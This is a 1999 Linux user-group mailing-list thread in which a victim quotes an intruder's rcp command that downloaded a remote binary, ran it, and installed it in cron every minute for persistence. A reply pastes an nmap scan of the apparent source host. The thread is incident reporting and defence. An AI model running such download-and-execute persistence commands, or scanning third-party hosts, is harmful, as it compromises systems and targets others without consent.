[OLUG] RCP

Vincent Raffensberger vraffensberger at csm.edu
Tue Dec 14 18:46:37 UTC 1999 

Jason Ferguson wrote:
> 
> Todd wrote:
> 
> >         Can anyone tell me how to stop RCP access to my Linux box, and if there are
> > any security tools available to monitor a RCP connection.  On December 11
> > someone gained access and perfomed the following to my machine:
> > rcp tcstewar at 129.97.50.62:.../lin /usr/sbin/rpc.listen ; chmod +x
> > /usr/sbin/rpc.listen; /usr/sbin/rpc.listen ; echo \* \* \* \* \*
> > /usr/sbin/rpc.listen > cron ; crontab cron ; exit ;
> >         I currently am running logwatch and uwatch, but this connection did not
> > show up in either.      Any suggestions would be welcomed.
> >
> > -------------------------------------------------------------------------
> 
> Anyone got a location to grab logwatch?  Doesnt seem to have come with RH 6.1... with
> a cable modem its only a matter of time before someone tries this stuff with me, and I
> still doing have a decent firewall on this thing (I still dont know how the rules
> should be written, what to block, etc).
> 
> Jason
> 
> -------------------------------------------------------------------------

You can get it here:

ftp://BOFH.CSM.EDU/pub/linux/apps/rpms/

Here's some info on Todd's friend:

Starting nmap V. 2.3BETA6 by Fyodor (fyodor at dhp.com,
www.insecure.org/nmap/)
 Interesting ports on engmail.uwaterloo.ca (129.97.50.62):
Port    State       Protocol  Service
21      open        tcp       ftp                     
22      open        tcp       ssh                     
23      open        tcp       telnet                  
25      open        tcp       smtp                    
53      filtered    tcp       domain                  
79      open        tcp       finger                  
80      open        tcp       http                    
87      filtered    tcp       priv-term-l             
106     open        tcp       pop3pw                  
110     open        tcp       pop-3                   
111     filtered    tcp       sunrpc                  
143     open        tcp       imap2                   
513     open        tcp       login                   
514     open        tcp       shell                   
515     open        tcp       printer                 
540     filtered    tcp       uucp                    
2049    filtered    tcp       nfs                     

TCP Sequence Prediction: Class=random positive increments
                         Difficulty=72739 (Worthy challenge)
Remote operating system guess: FreeBSD 2.2.1 - 4.0

Nmap run completed -- 1 IP address (1 host up) scanned in 78 seconds
-- 
Vincent Raffensberger		College of Saint Mary
Network Administrator		1901 S. 72nd. St.
402-399-2433                    Omaha, NE 68124

-------------------------------------------------------------------------
Sent by OLUG Mailing list Manager, run by ezmlm.  http://olug.bstc.net/ 
To unsubscribe: `echo unsubsribe | mail olug-unsubscribe at bstc.net`

More information about the OLUG mailing list